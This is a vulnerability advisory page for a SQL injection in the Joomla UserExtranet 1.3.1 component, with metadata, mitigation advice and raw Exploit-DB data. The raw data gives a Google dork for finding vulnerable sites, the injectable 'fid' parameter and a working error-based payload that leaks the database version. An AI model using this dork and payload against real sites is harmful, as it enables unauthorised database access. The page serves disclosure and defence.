Joomla! Component UserExtranet v1.3.1 - SQL Injection

vendor:

UserExtranet

by:

Ihsan Sencan

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: UserExtranet

Affected Version From: 1.3.1

Affected Version To: 1.3.1

Patch Exists: YES

Related CWE: N/A

CPE: a:beesto:userextranet:1.3.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win7 x64, Kali Linux x64

2017

Joomla! Component UserExtranet v1.3.1 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component UserExtranet v1.3.1. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable application. This can allow the attacker to gain access to sensitive information from the database.

Mitigation:

Developers should always use parameterized queries, or use other methods such as stored procedures, when interacting with the database. Additionally, developers should always sanitize user input to prevent malicious code from being injected into the database.

Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Joomla! Component UserExtranet v1.3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_userextranet
# Date: 23.02.2017
# Vendor Homepage: http://www.beesto.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/access-a-security/site-access/userextranet/
# Demo: http://www.beesto.com/extensions/18-userextranet/93-demo
# Version: 1.3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?option=com_userextranet&view=folders&fid=[SQL]
# 66+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# # # # #